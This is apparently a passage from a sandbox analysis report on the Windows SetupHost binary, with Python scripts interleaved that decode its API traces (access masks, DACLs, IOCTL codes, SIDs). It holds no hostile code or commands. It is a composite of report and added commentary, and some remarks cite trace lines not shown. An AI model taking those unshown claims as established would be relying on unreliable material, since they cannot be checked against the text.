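CALL_RE = re.compile(r"^\s*(?:•\s*)?(\w+)\.(\w+)\((.*)\),\s*ref:\s*([0-9A-Fa-f]+)")
HEX_RE = re.compile(r"^([0-9A-Fa-f]{1,8})(?:\(.*\))?$")  # also "00000001(TokenIntegrityLevel)"


def parse_call(line):
    """Split one 'Name.MODULE(args), ref: addr' trace line; None if not a call."""
    m = CALL_RE.match(line)
    if not m:
        return None
    name, module, argstr, ref = m.groups()
    return {"name": name, "module": module, "ref": ref,
            "args": [a.strip() for a in argstr.split(",")]}


def hexarg(a):
    """Integer value of a hex trace argument, None for '?' or non-hex slots."""
    m = HEX_RE.match(a)
    return int(m.group(1), 16) if m else None


def decode_sid(call, authority=NT_AUTHORITY):
    """AllocateAndInitializeSid(pAuth, nSub, s0..s7, *pSid) -> (sid, name, out_ptr)."""
    args = call["args"]
    n = hexarg(args[1])
    if n is None or n > 8:
        return None
    subs = [hexarg(a) for a in args[2:2 + n]]
    sid = "S-1-%d-%s" % (authority, "-".join(str(s) for s in subs))
    out_ptr = args[10] if len(args) > 10 else "?"   # slot after the 8 sub-authorities
    return sid, WELL_KNOWN.get(sid, "(not a well-known SID)"), out_ptr


def decode_mask(mask):
    """Expand the generic/standard bits of an ACCESS_MASK; leftover bits kept as hex."""
    names = [n for bit, n in ACCESS_BITS if mask & bit]
    rest = mask & ~sum(bit for bit, _ in ACCESS_BITS) & 0xFFFFFFFF
    if rest:
        names.append("0x%08X" % rest)   # object-specific rights, not decoded here
    return names


def decode_dacl(trace):
    """Return {'sids': [...], 'aces': [...]} recovered from the trace lines.

    Matching an ACE to a SID relies on the pSid out-pointer value reappearing
    as the ACE's 4th argument; pointers the trace prints as '?' or 0 stay
    unresolved rather than being guessed.
    """
    by_ptr, sids, aces = {}, [], []
    for line in trace.splitlines():
        call = parse_call(line)
        if call is None:
            continue
        if call["name"] == "AllocateAndInitializeSid":
            dec = decode_sid(call)
            if dec:
                sid, name, ptr = dec
                sids.append({"ref": call["ref"], "sid": sid, "name": name, "ptr": ptr})
                if hexarg(ptr):          # skip '?' and NULL out-slots
                    by_ptr[ptr] = (sid, name)
        elif call["name"] == "AddAccessAllowedAce":
            mask = hexarg(call["args"][2])
            sid, name = by_ptr.get(call["args"][3], ("?", "unresolved SID pointer"))
            aces.append({"ref": call["ref"], "sid": sid, "name": name,
                         "mask": mask, "rights": decode_mask(mask)})
    return {"sids": sids, "aces": aces}


if __name__ == "__main__":
    result = decode_dacl(TRACE)
    for s in result["sids"]:
        print("SID   @%s  %-14s %s" % (s["ref"], s["sid"], s["name"]))
    for a in result["aces"]:
        print("ACE   @%s  0x%08X %-14s %s  %s"
              % (a["ref"], a["mask"], a["sid"], a["name"], "|".join(a["rights"])))
```

The two 0xC01F0000 ACEs grant GENERIC_READ|GENERIC_WRITE plus STANDARD_RIGHTS_ALL (DELETE, READ_CONTROL, WRITE_DAC, WRITE_OWNER, SYNCHRONIZE) to Administrators and SYSTEM; the 0xC0110000 ACE grants only GENERIC_READ|GENERIC_WRITE|DELETE|SYNCHRONIZE, so its grantee cannot change the object's DACL or owner. The fourth ACE's SID argument is 00000000 in the trace, consistent with the EqualSid check just before it selecting a SID pointer the plugin did not print; the decoder reports it as unresolved for that reason.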
APIs
• __EH_prolog3_GS.LIBCMT ref: 0054D46A
• memset.MSVCRT ref: 0054D4A1
• RtlGetVersion.NTDLL ref: 0054D4BA
• GetModuleHandleW.KERNEL32(kernel32.dll,GetProductInfo), ref: 0054D519
• GetProcAddress.KERNEL32(00000000), ref: 0054D520
• GetLastError.KERNEL32 ref: 0054D52C
Memory Dump Source
• Source File: 0000000D.00000002.2919234544.00000000004DC000.00000020.00000001.01000000.0000000D.sdmp, Offset: 004C0000, based on PE: true
• Associated: 0000000D.00000002.2919062803.00000000004C0000.00000002.00000001.01000000.0000000D.sdmp
• Associated: 0000000D.00000002.2919234544.00000000004C1000.00000020.00000001.01000000.0000000D.sdmp
• Associated: 0000000D.00000002.2919779136.0000000000553000.00000004.00000001.01000000.0000000D.sdmp
• Associated: 0000000D.00000002.2920062521.0000000000557000.00000002.00000001.01000000.0000000D.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_13_2_4c0000_SetupHost.jbxd
Similarity
• API ID: AddressErrorH_prolog3_HandleLastModuleProcVersionmemset
• String ID: Client$GetProductInfo$InstallationType$Server$Server Core$Software\Microsoft\Windows NT\CurrentVersion$kernel32.dll
• API String ID: 1560655752-3879065230
• Opcode ID: 285c64e365c36c145b5c56e39e4c37c10a7d2a019a24f7cd24e00b0025ba6d79
• Instruction ID: 8c4be5ac1a8df71ddfb803cba97e97c73e9bb76e16e65baedf94d23564d656e6
• Opcode Fuzzy Hash: 285c64e365c36c145b5c56e39e4c37c10a7d2a019a24f7cd24e00b0025ba6d79
• Instruction Fuzzy Hash: 1A41B0709002299BCF24ABA59C587FD7EB4BB4931CF1005AAE905A6240DB389F80CF65
APIs
• SetLastError.KERNEL32(00000057), ref: 004FE47A
  • Part of subcall function 004FE5FC: GetLastError.KERNEL32(?,00000000,00000000,?,?,?,004FE360,?,00000000,00000000,004FF550), ref: 004FE660
  • Part of subcall function 004FE5FC: GetLastError.KERNEL32(?,?,?,004FE360,?,00000000,00000000,004FF550), ref: 004FE676
  • Part of subcall function 004FE5FC: _wcsnicmp.MSVCRT ref: 004FE6C3
  • Part of subcall function 004FE5FC: _wcsnicmp.MSVCRT ref: 004FE6DB
• CreateFileW.KERNEL32(00000000,C0000000,00000003,00000000,00000003,02000000,00000000), ref: 004FE405
• DeviceIoControl.KERNEL32(00000000,0009C040,?,00000002,00000000,00000000,?,00000000), ref: 004FE430
• GetLastError.KERNEL32 ref: 004FE43A
• CloseHandle.KERNEL32(00000000), ref: 004FE44C
• GetLastError.KERNEL32 ref: 004FE454
• GetProcessHeap.KERNEL32(00000000,00000000), ref: 004FE45F
• HeapFree.KERNEL32(00000000), ref: 004FE466
• SetLastError.KERNEL32(00000000), ref: 004FE46D
Memory Dump Source
• Source File: 0000000D.00000002.2919234544.00000000004DC000.00000020.00000001.01000000.0000000D.sdmp, Offset: 004C0000, based on PE: true
• Associated: 0000000D.00000002.2919062803.00000000004C0000.00000002.00000001.01000000.0000000D.sdmp
• Associated: 0000000D.00000002.2919234544.00000000004C1000.00000020.00000001.01000000.0000000D.sdmp
• Associated: 0000000D.00000002.2919779136.0000000000553000.00000004.00000001.01000000.0000000D.sdmp
• Associated: 0000000D.00000002.2920062521.0000000000557000.00000002.00000001.01000000.0000000D.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_13_2_4c0000_SetupHost.jbxd
Similarity
• API ID: ErrorLast$Heap_wcsnicmp$CloseControlCreateDeviceFileFreeHandleProcess
• String ID:
• API String ID: 2742103690-0
• Opcode ID: 34d2478261f077f0030df3614f7cc3fedfa3e3420b9dcb882f11216ed9bf200d
• Instruction ID: e24e245654042e331efe7c22ebb0fb8aa18c81791df57b914e505d289a486668
• Opcode Fuzzy Hash: 34d2478261f077f0030df3614f7cc3fedfa3e3420b9dcb882f11216ed9bf200d
• Instruction Fuzzy Hash: DD11E471604308BBE7105BB6AC4CF7B7BBCDBC8717F14845AFA02D22A0D6744D05A629
APIs
• AllocateAndInitializeSid.ADVAPI32(?,00000002,00000020,00000220,00000000,00000000,00000000,00000000,00000000,00000000,?,WdsSetupLogInit,00000000), ref: 0050118B
• CheckTokenMembership.KERNELBASE(00000000,?,?), ref: 005011A0
• GetLastError.KERNEL32 ref: 005011AF
• FreeSid.ADVAPI32(?), ref: 005011BA
• GetLastError.KERNEL32 ref: 005011C2
• SetLastError.KERNEL32(00000000), ref: 005011CB
Memory Dump Source
• Source File: 0000000D.00000002.2919234544.00000000004DC000.00000020.00000001.01000000.0000000D.sdmp, Offset: 004C0000, based on PE: true
• Associated: 0000000D.00000002.2919062803.00000000004C0000.00000002.00000001.01000000.0000000D.sdmp
• Associated: 0000000D.00000002.2919234544.00000000004C1000.00000020.00000001.01000000.0000000D.sdmp
• Associated: 0000000D.00000002.2919779136.0000000000553000.00000004.00000001.01000000.0000000D.sdmp
• Associated: 0000000D.00000002.2920062521.0000000000557000.00000002.00000001.01000000.0000000D.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_13_2_4c0000_SetupHost.jbxd
Similarity
• API ID: ErrorLast$AllocateCheckFreeInitializeMembershipToken
• String ID: WdsSetupLogInit
• API String ID: 1125035699-3317556560
• Opcode ID: 2c04d27c09ab7751f0bb7337f0f6f2338ae709f93b9f9b2ef9b7f781f14e69c8
• Instruction ID: 206816dde56415ffbb203d0d40b3e55463de6e18bc1d62ef1d7a6c6d7caec639
• Opcode Fuzzy Hash: 2c04d27c09ab7751f0bb7337f0f6f2338ae709f93b9f9b2ef9b7f781f14e69c8
• Instruction Fuzzy Hash: E2110074A0431DAFDB04DFA0EC899BE7BB8FB08355F100469E902E2291D7309E08DA65
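The two records above carry argument constants that the report prints raw: the DeviceIoControl control code 0009C040 and the CreateFileW access/share/disposition/flag values in the first record, and the SID sub-authorities 00000020 / 00000220 passed to AllocateAndInitializeSid in the second. Decoding them is how an analyst turns these lines into behaviour. The script below is an added example, not part of the Joe Sandbox report or of the sampled binary: it parses trace lines in the report's own format and inverts the Windows CTL_CODE macro, expands the CreateFileW bit flags, and rebuilds the SID. Assumptions: the identifier-authority argument the sandbox shows as "?" is taken to be SECURITY_NT_AUTHORITY (5), and the FSCTL name table is a short hand-written subset of winioctl.h; the sample lines are copied from the two records above.

```python
import re

# Windows SDK constants (winioctl.h / winnt.h / fileapi.h); values are fixed in the public headers.
DEVICE_TYPES = {0x00000009: "FILE_DEVICE_FILE_SYSTEM"}
METHODS = {0: "METHOD_BUFFERED", 1: "METHOD_IN_DIRECT", 2: "METHOD_OUT_DIRECT", 3: "METHOD_NEITHER"}
IOCTL_ACCESS = {0: "FILE_ANY_ACCESS", 1: "FILE_READ_DATA", 2: "FILE_WRITE_DATA",
                3: "FILE_READ_DATA|FILE_WRITE_DATA"}
# (device, function, method, access) -> name; a small hand-written subset of winioctl.h, extend as needed
FSCTL_NAMES = {
    (9, 15, 0, 0): "FSCTL_GET_COMPRESSION",    # 0x0009003C
    (9, 16, 0, 3): "FSCTL_SET_COMPRESSION",    # 0x0009C040
    (9, 41, 0, 0): "FSCTL_SET_REPARSE_POINT",  # 0x000900A4
    (9, 42, 0, 0): "FSCTL_GET_REPARSE_POINT",  # 0x000900A8
}
GENERIC_ACCESS = {0x80000000: "GENERIC_READ", 0x40000000: "GENERIC_WRITE",
                  0x20000000: "GENERIC_EXECUTE", 0x10000000: "GENERIC_ALL"}
SHARE_MODE = {0x1: "FILE_SHARE_READ", 0x2: "FILE_SHARE_WRITE", 0x4: "FILE_SHARE_DELETE"}
CREATION = {1: "CREATE_NEW", 2: "CREATE_ALWAYS", 3: "OPEN_EXISTING", 4: "OPEN_ALWAYS", 5: "TRUNCATE_EXISTING"}
FILE_FLAGS = {0x02000000: "FILE_FLAG_BACKUP_SEMANTICS", 0x00200000: "FILE_FLAG_OPEN_REPARSE_POINT",
              0x40000000: "FILE_FLAG_OVERLAPPED", 0x80000000: "FILE_FLAG_WRITE_THROUGH",
              0x00000080: "FILE_ATTRIBUTE_NORMAL"}

# One Joe Sandbox API line: Api.MODULE(arg,arg,...), ref: CALLSITE
TRACE_RE = re.compile(r"(?P<api>\w+)\.(?P<module>[\w.]+)\((?P<args>[^)]*)\),\s*ref:\s*(?P<ref>[0-9A-Fa-f]+)")

def parse_trace(line):
    """Split one trace line into api, module, raw argument list and call-site address."""
    m = TRACE_RE.search(line)
    if not m:
        return None
    args = [a.strip() for a in m.group("args").split(",")]
    return {"api": m.group("api"), "module": m.group("module"), "args": args, "ref": int(m.group("ref"), 16)}

def arg_int(arg):
    """Hex argument -> int; '?' (value not recovered by the sandbox) or a string literal -> None."""
    try:
        return int(arg, 16)
    except ValueError:
        return None

def flag_names(value, table):
    """Expand a bit mask into the names of every flag fully contained in it."""
    names = [name for bit, name in table.items() if (value & bit) == bit]
    return "|".join(names) if names else hex(value)

def decode_ioctl(code):
    """Invert the CTL_CODE macro: code = (DeviceType<<16) | (Access<<14) | (Function<<2) | Method."""
    device, access = (code >> 16) & 0xFFFF, (code >> 14) & 0x3
    function, method = (code >> 2) & 0xFFF, code & 0x3
    return {"device": DEVICE_TYPES.get(device, hex(device)), "function": function,
            "method": METHODS[method], "access": IOCTL_ACCESS[access],
            "name": FSCTL_NAMES.get((device, function, method, access), "unknown")}

def decode_createfile(args):
    """CreateFileW(lpFileName, dwDesiredAccess, dwShareMode, lpSA, dwCreationDisposition, dwFlags, hTemplate)."""
    access, share, disp, flags = (arg_int(a) for a in (args[1], args[2], args[4], args[5]))
    return {"access": flag_names(access, GENERIC_ACCESS), "share": flag_names(share, SHARE_MODE),
            "disposition": CREATION.get(disp, hex(disp)), "flags": flag_names(flags, FILE_FLAGS)}

def sid_from_args(args, authority=5):
    """AllocateAndInitializeSid(pIdentifierAuthority, nSubAuthorityCount, sub0..sub7, ppSid) -> SDDL string.
    The authority pointer is shown as '?' in the trace, so SECURITY_NT_AUTHORITY (5) is assumed."""
    count = arg_int(args[1])
    subs = [arg_int(a) for a in args[2:2 + count]]
    return "S-1-%d-%s" % (authority, "-".join(str(s) for s in subs))

def decode_call(line):
    """Parse a trace line and attach a decoded view for the APIs handled here."""
    rec = parse_trace(line)
    if rec is None:
        return None
    if rec["api"] == "DeviceIoControl":
        rec["decoded"] = decode_ioctl(arg_int(rec["args"][1]))
    elif rec["api"] == "CreateFileW":
        rec["decoded"] = decode_createfile(rec["args"])
    elif rec["api"] == "AllocateAndInitializeSid":
        sid = sid_from_args(rec["args"])
        rec["decoded"] = {"sid": sid,
                          "well_known": "BUILTIN\\Administrators" if sid == "S-1-5-32-544" else "unknown"}
    return rec

# Trace lines copied from the two report records above (not constructed).
SAMPLE_LINES = [
    "CreateFileW.KERNEL32(00000000,C0000000,00000003,00000000,00000003,02000000,00000000), ref: 004FE405",
    "DeviceIoControl.KERNEL32(00000000,0009C040,?,00000002,00000000,00000000,?,00000000), ref: 004FE430",
    "AllocateAndInitializeSid.ADVAPI32(?,00000002,00000020,00000220,00000000,00000000,00000000,00000000,"
    "00000000,00000000,?,WdsSetupLogInit,00000000), ref: 0050118B",
]

if __name__ == "__main__":
    for line in SAMPLE_LINES:
        rec = decode_call(line)
        print("%s @ %08X -> %s" % (rec["api"], rec["ref"], rec.get("decoded")))
```

Read against the records: 0009C040 decodes to FILE_DEVICE_FILE_SYSTEM, function 16, METHOD_BUFFERED, FILE_READ_DATA|FILE_WRITE_DATA, i.e. FSCTL_SET_COMPRESSION, which fits the 2-byte input buffer (nInBufferSize 00000002, a USHORT compression state) and the GENERIC_READ|GENERIC_WRITE, OPEN_EXISTING, FILE_FLAG_BACKUP_SEMANTICS handle opened just before it. The SID S-1-5-32-544 together with CheckTokenMembership on a NULL token (first argument 00000000, so the calling thread's token is used) is the standard BUILTIN\Administrators membership test; the WdsSetupLogInit string on the stack is consistent with this being SetupHost's own setup-logging code rather than anything sample-specific.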
APIs
• GetModuleHandleW.KERNEL32(kernel32.dll,GetNativeSystemInfo,00000000), ref: 0053DCA1
• GetProcAddress.KERNEL32(00000000), ref: 0053DCA8
• GetNativeSystemInfo.KERNEL32 ref: 0053DCC0
• GetSystemInfo.KERNEL32(?), ref: 0053DCC4
Memory Dump Source
• Source File: 0000000D.00000002.2919234544.00000000004DC000.00000020.00000001.01000000.0000000D.sdmp, Offset: 004C0000, based on PE: true
• Associated: 0000000D.00000002.2919062803.00000000004C0000.00000002.00000001.01000000.0000000D.sdmp
• Associated: 0000000D.00000002.2919234544.00000000004C1000.00000020.00000001.01000000.0000000D.sdmp
• Associated: 0000000D.00000002.2919779136.0000000000553000.00000004.00000001.01000000.0000000D.sdmp
• Associated: 0000000D.00000002.2920062521.0000000000557000.00000002.00000001.01000000.0000000D.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_13_2_4c0000_SetupHost.jbxd
Similarity
• API ID: InfoSystem$AddressHandleModuleNativeProc
• String ID: GetNativeSystemInfo$kernel32.dll
• API String ID: 3433367815-192647395
• Opcode ID: e6e884ee54a341e76d1bd4883864e53cb61cbc0b613fa1663477f89c7fbf842e
• Instruction ID: 3607d4ac26d9a12294a6e3a9acfa58a16de6ac7a5163c5887e5080ac70e0fbba
• Opcode Fuzzy Hash: e6e884ee54a341e76d1bd4883864e53cb61cbc0b613fa1663477f89c7fbf842e
• Instruction Fuzzy Hash: DFF0627169421C92CB2213697D1DAAE3FB8B748757F241953F903D21D0D9D0CC45D2B5
APIs
• NtPowerInformation.NTDLL(00000042,00000000,00000000,?,00000001), ref: 004E7B4C
Memory Dump Source
• Source File: 0000000D.00000002.2919234544.00000000004DC000.00000020.00000001.01000000.0000000D.sdmp, Offset: 004C0000, based on PE: true
• Associated: 0000000D.00000002.2919062803.00000000004C0000.00000002.00000001.01000000.0000000D.sdmp
• Associated: 0000000D.00000002.2919234544.00000000004C1000.00000020.00000001.01000000.0000000D.sdmp
• Associated: 0000000D.00000002.2919779136.0000000000553000.00000004.00000001.01000000.0000000D.sdmp
• Associated: 0000000D.00000002.2920062521.0000000000557000.00000002.00000001.01000000.0000000D.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_13_2_4c0000_SetupHost.jbxd
Similarity
• API ID: InformationPower
• String ID: CSystemHelper::CheckConnectedStandby$SetupUI: Connected standby: [%s]$SetupUI: Detecting connected standby capability...$Yes
• API String ID: 33107167-1862664920
• Opcode ID: d46782189e1f16f0dea775074dc7e9b973dc6dcc45cd5d16e53cf8906f09d4f5
• Instruction ID: b9419dc8d9ad78304ee8bfc259506c96b916daf9d0517568ef32b5d0aec51fb7
• Opcode Fuzzy Hash: d46782189e1f16f0dea775074dc7e9b973dc6dcc45cd5d16e53cf8906f09d4f5
• Instruction Fuzzy Hash: 6931E6B0B04208AFDF04A7699C6DF3EBBA5DF88725F04805FE80697381DE78AD059759
APIs
• NtQueryLicenseValue.NTDLL(00553190,00000000,00000000,00000004,00000000), ref: 0054B320
Strings
• ConfigureTelemetryOptInSettingsUx, xrefs: 0054B2AB
Memory Dump Source
• Source File: 0000000D.00000002.2919234544.00000000004DC000.00000020.00000001.01000000.0000000D.sdmp, Offset: 004C0000, based on PE: true
• Associated: 0000000D.00000002.2919062803.00000000004C0000.00000002.00000001.01000000.0000000D.sdmp
• Associated: 0000000D.00000002.2919234544.00000000004C1000.00000020.00000001.01000000.0000000D.sdmp
• Associated: 0000000D.00000002.2919779136.0000000000553000.00000004.00000001.01000000.0000000D.sdmp
• Associated: 0000000D.00000002.2920062521.0000000000557000.00000002.00000001.01000000.0000000D.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_13_2_4c0000_SetupHost.jbxd
Similarity
• API ID: LicenseQueryValue
• String ID: ConfigureTelemetryOptInSettingsUx
• API String ID: 22271514-4247868660
• Opcode ID: 651c641b8809e3fd97c5f32b86807bce9032eb7e5309d518ab744589da7c7c28
• Instruction ID: 51fe807b25727bc59512fe34ad94ec9ba7fd159b39afa3ccf8c3b9c237eb3313
• Opcode Fuzzy Hash: 651c641b8809e3fd97c5f32b86807bce9032eb7e5309d518ab744589da7c7c28
• Instruction Fuzzy Hash: 9521AC79D0421AABEB21CF99C8547EEBFF4FB84319F00096AD551A2284E7B0DA84DB51
                                                                                                                        Memory Dump Source
                                                                                                                        • Source File: 0000000D.00000002.2919234544.00000000004DC000.00000020.00000001.01000000.0000000D.sdmp, Offset: 004C0000, based on PE: true
                                                                                                                        • Associated: 0000000D.00000002.2919062803.00000000004C0000.00000002.00000001.01000000.0000000D.sdmpDownload File
                                                                                                                        • Associated: 0000000D.00000002.2919234544.00000000004C1000.00000020.00000001.01000000.0000000D.sdmpDownload File
                                                                                                                        • Associated: 0000000D.00000002.2919779136.0000000000553000.00000004.00000001.01000000.0000000D.sdmpDownload File
                                                                                                                        • Associated: 0000000D.00000002.2920062521.0000000000557000.00000002.00000001.01000000.0000000D.sdmpDownload File
                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                        • Snapshot File: hcaresult_13_2_4c0000_SetupHost.jbxd
                                                                                                                        Similarity
                                                                                                                        • API ID: Library$AddressFreeLicenseLoadProcQueryValue
                                                                                                                        • String ID:
                                                                                                                        • API String ID: 3617071427-0
                                                                                                                        • Opcode ID: 80fd118ea5101af6f24b68b65a0e4b7a395437a6efb102fcd36acb4966aef7e4
                                                                                                                        • Instruction ID: 908ace2e4907e17a4fa6fa8c3656b1289d2b781a0e7a68e0d558f87e6cbcbff1
                                                                                                                        • Opcode Fuzzy Hash: 80fd118ea5101af6f24b68b65a0e4b7a395437a6efb102fcd36acb4966aef7e4
                                                                                                                        • Instruction Fuzzy Hash: 3521B479E0D309ABEB218B94C4547EEBFF4BB80748F14406AD841A7291EBF5CE89C751

Control-flow Graph

(rendered graph not reproduced; in the report its basic blocks are coloured Executed or Not Executed)
• Function 004FA6C1: entry block 4fa6c1-4fa793 calls 54f3e6; the recovered edges lead through blocks calling 4fc419, 4f8a19, 4fc159 and 4fb1d4 (RegQueryValueExW), then the block at 4fa9e2-4faa1f (memset, RtlGetVersion, call 4f9ca1), GetProductInfo at 4faa31-4faa56, four _wtoi calls at 4face0-4fad33 followed by call 4fc50b, and the exit path through 4fae05-4fae27 (call 4f9d9c, call 4eee5d) to 4faf2b-4faf4d (call 4fb721, call 4eee5d, call 54f3a4).
                                                                                                                        APIs
                                                                                                                        • memset.MSVCRT ref: 004FA9F1
                                                                                                                        • RtlGetVersion.NTDLL ref: 004FAA0A
                                                                                                                        • GetProductInfo.KERNEL32(?,?,?,?,?), ref: 004FAA4E
                                                                                                                        • __EH_prolog3_GS.LIBCMT ref: 004FA6CB
                                                                                                                          • Part of subcall function 004F8A19: __EH_prolog3.LIBCMT ref: 004F8A20
                                                                                                                          • Part of subcall function 004FC159: __EH_prolog3_GS.LIBCMT ref: 004FC163
                                                                                                                          • Part of subcall function 004FC159: memset.MSVCRT ref: 004FC188
                                                                                                                          • Part of subcall function 004FB1D4: RegQueryValueExW.KERNEL32(00000000,00000000,00000000,?,00000000,?,00000001,00000000,00000000,00000000), ref: 004FB216
                                                                                                                          • Part of subcall function 004FB1D4: GetProcessHeap.KERNEL32(00000000,?), ref: 004FB237
                                                                                                                          • Part of subcall function 004FB1D4: HeapAlloc.KERNEL32(00000000), ref: 004FB23E
                                                                                                                          • Part of subcall function 004FB1D4: GetProcessHeap.KERNEL32(00000000,00000000,00000001,00000000,00000000,00000000), ref: 004FB29E
                                                                                                                          • Part of subcall function 004FB1D4: HeapFree.KERNEL32(00000000), ref: 004FB2A5
                                                                                                                          • Part of subcall function 004FB1D4: RegCloseKey.KERNEL32(00000000,00000001,00000000,00000000,00000000), ref: 004FB2B4
                                                                                                                        Strings
                                                                                                                        Memory Dump Source
                                                                                                                        • Source File: 0000000D.00000002.2919234544.00000000004DC000.00000020.00000001.01000000.0000000D.sdmp, Offset: 004C0000, based on PE: true
• Associated: 0000000D.00000002.2919062803.00000000004C0000.00000002.00000001.01000000.0000000D.sdmp
• Associated: 0000000D.00000002.2919234544.00000000004C1000.00000020.00000001.01000000.0000000D.sdmp
• Associated: 0000000D.00000002.2919779136.0000000000553000.00000004.00000001.01000000.0000000D.sdmp
• Associated: 0000000D.00000002.2920062521.0000000000557000.00000002.00000001.01000000.0000000D.sdmp
                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                        • Snapshot File: hcaresult_13_2_4c0000_SetupHost.jbxd
                                                                                                                        Similarity
                                                                                                                        • API ID: Heap$H_prolog3_Processmemset$AllocCloseFreeH_prolog3InfoProductQueryValueVersion
                                                                                                                        • String ID: %d.%d.%d.%d$%lu$CMoSetupOneSettingsHelperT<class CEmptyType>::AddQueryStringParameters$EditionId$InstallationType$MachineId$OneSettings: AppVer [%s.%s.%s.%s]$OneSettings: Branch [%s]$OneSettings: DeviceId [%s]$OneSettings: EditionId [%s]$OneSettings: InstallationType [%s]$OneSettings: OS [%s]$OneSettings: OsVer [%s]$OneSettings: Ring [%s]$OneSettings: ScenarioId [%s]$OneSettings: Sku [%s]$OneSettingsBranch$OneSettingsVersion$Ring$SOFTWARE\Microsoft\SQMClient$SOFTWARE\Microsoft\Windows NT\CurrentVersion$SOFTWARE\Microsoft\WindowsSelfHost\Applicability$SYSTEM\Setup\MoSetup$appBuildLab$deviceId$osver$platformEdition$platformInstallationType$ring$scenarioId$sku$windows
                                                                                                                        • API String ID: 3255902165-1952152101
                                                                                                                        • Opcode ID: 8cc4a4232c9d3d5761d978cae27d4cadef82c00c5dcc81da94d9032461e59ba0
                                                                                                                        • Instruction ID: fc2cae794f69ac0e03c78d9bd8a6a154bb1164ff629a0a41158603043f11886f
                                                                                                                        • Opcode Fuzzy Hash: 8cc4a4232c9d3d5761d978cae27d4cadef82c00c5dcc81da94d9032461e59ba0
                                                                                                                        • Instruction Fuzzy Hash: 3F3292B0B0031D9BDB559E65CC85BFA77B5AB48304F1040EEE60CA7282DBB89E54CF59

Control-flow Graph

Control-flow graph of the routine at 004EAFD5 (rendered as an image in the original report; the graph serialization is omitted here). Basic blocks span 004EAFD5 to 004EB6D9. Blocks that call imported APIs: 004EB045 (GetProcessHeap, HeapAlloc) and 004EB170, 004EB17F, 004EB18C, 004EB197, 004EB1A5 (SysFreeString).
                                                                                                                        APIs
                                                                                                                        • __EH_prolog3.LIBCMT ref: 004EAFDC
                                                                                                                        • GetProcessHeap.KERNEL32(00000000,0000001C), ref: 004EB049
                                                                                                                        • HeapAlloc.KERNEL32(00000000), ref: 004EB050
                                                                                                                          • Part of subcall function 004F8A19: __EH_prolog3.LIBCMT ref: 004F8A20
                                                                                                                          • Part of subcall function 004F858F: __EH_prolog3.LIBCMT ref: 004F8596
                                                                                                                          • Part of subcall function 004F858F: SysFreeString.OLEAUT32(00000000), ref: 004F86B4
                                                                                                                          • Part of subcall function 004F858F: GetProcessHeap.KERNEL32(00000000,00000000), ref: 004F86C1
                                                                                                                          • Part of subcall function 004F858F: HeapFree.KERNEL32(00000000), ref: 004F86C8
                                                                                                                        • SysFreeString.OLEAUT32(00000000), ref: 004EB173
                                                                                                                        • SysFreeString.OLEAUT32(00000000), ref: 004EB182
                                                                                                                        • SysFreeString.OLEAUT32(00000000), ref: 004EB18D
                                                                                                                        • SysFreeString.OLEAUT32(?), ref: 004EB198
                                                                                                                        • SysFreeString.OLEAUT32(?), ref: 004EB1A6
                                                                                                                        Strings
                                                                                                                        Memory Dump Source
                                                                                                                        • Source File: 0000000D.00000002.2919234544.00000000004DC000.00000020.00000001.01000000.0000000D.sdmp, Offset: 004C0000, based on PE: true
• Associated: 0000000D.00000002.2919062803.00000000004C0000.00000002.00000001.01000000.0000000D.sdmp
• Associated: 0000000D.00000002.2919234544.00000000004C1000.00000020.00000001.01000000.0000000D.sdmp
• Associated: 0000000D.00000002.2919779136.0000000000553000.00000004.00000001.01000000.0000000D.sdmp
• Associated: 0000000D.00000002.2920062521.0000000000557000.00000002.00000001.01000000.0000000D.sdmp
                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                        • Snapshot File: hcaresult_13_2_4c0000_SetupHost.jbxd
                                                                                                                        Similarity
                                                                                                                        • API ID: Free$String$Heap$H_prolog3$Process$Alloc
                                                                                                                        • String ID: COMPACTOSENABLED$CSetupHost::InitializeOneSettings$DIAGNOSTICANALYSISENABLED$DIAGNOSTICANALYSISTIMEOUT$DOWNLOADFREESPACEPADDING$DOWNLOADFREESPACEREQUIRED$DUCATEGORIES_FLAG$DUCHANNELS_FLAG$EXTERNALFREESPACEPADDING$EXTERNALFREESPACEREQUIRED$FACILITATORURL$MIGNEOENABLED$MIGROLLBACKENABLED$POSTUPGRADEFREESPACEPERCENTAGE$POSTUPGRADEFREESPACEREQUIRED$PRIORITYLEVEL$SetupHost: Attempting to initialize OneSettings values$SetupHost: Ignoring priority setting.$SetupHost: OneSettings Initialized -> [%s]$SetupHost: Skipping OneSettings initialization for Azure Host$UNINSTALLENABLED$UPDATEMEDIAENABLED$UPDATEMEDIAMCTLINK$UPDATEMEDIASETUPVERSION$Yes
                                                                                                                        • API String ID: 3733136790-3700976932
                                                                                                                        • Opcode ID: 32ac1e5fbbf44e11a18155ea01e28bc98c22d3239a54551cfce12944b8fcf910
                                                                                                                        • Instruction ID: ca9fd0c56a828e583d02fcb2fea54227b3b61232b8e5c7cd505a30eb3cd1d112
                                                                                                                        • Opcode Fuzzy Hash: 32ac1e5fbbf44e11a18155ea01e28bc98c22d3239a54551cfce12944b8fcf910
                                                                                                                        • Instruction Fuzzy Hash: C822AF74A002189BCF04DF66D895BAEBBB5EF48315F14406FED05AB391DF389805CBA8

Control-flow Graph

Control-flow graph of the routine at 0054AAD9 (rendered as an image in the original report; the graph serialization is omitted here). Basic blocks span 0054AAD9 to 0054ACD8. Blocks that call imported APIs: 0054AAD9 (LoadLibraryExW), 0054AB11 (GetProcAddress, two calls), 0054ABB0 through 0054AC2E (a chain of seven _wcsicmp comparisons against policy names), 0054AC41 (RegGetValueW) and 0054ACBD (FreeLibrary).
                                                                                                                        APIs
                                                                                                                        • LoadLibraryExW.KERNEL32(policymanager.dll,00000000,00000800,00000000,00000003,00000001,?,0054ADCD,00000000,00000000,?,00000000,0054B215), ref: 0054AB02
                                                                                                                        • GetProcAddress.KERNEL32(00000000,PolicyManager_GetPolicy), ref: 0054AB17
                                                                                                                        • GetProcAddress.KERNEL32(00000000,PolicyManager_FreeGetPolicyData), ref: 0054AB26
                                                                                                                        • FreeLibrary.KERNEL32(?), ref: 0054ACBE
                                                                                                                        Strings
                                                                                                                        Memory Dump Source
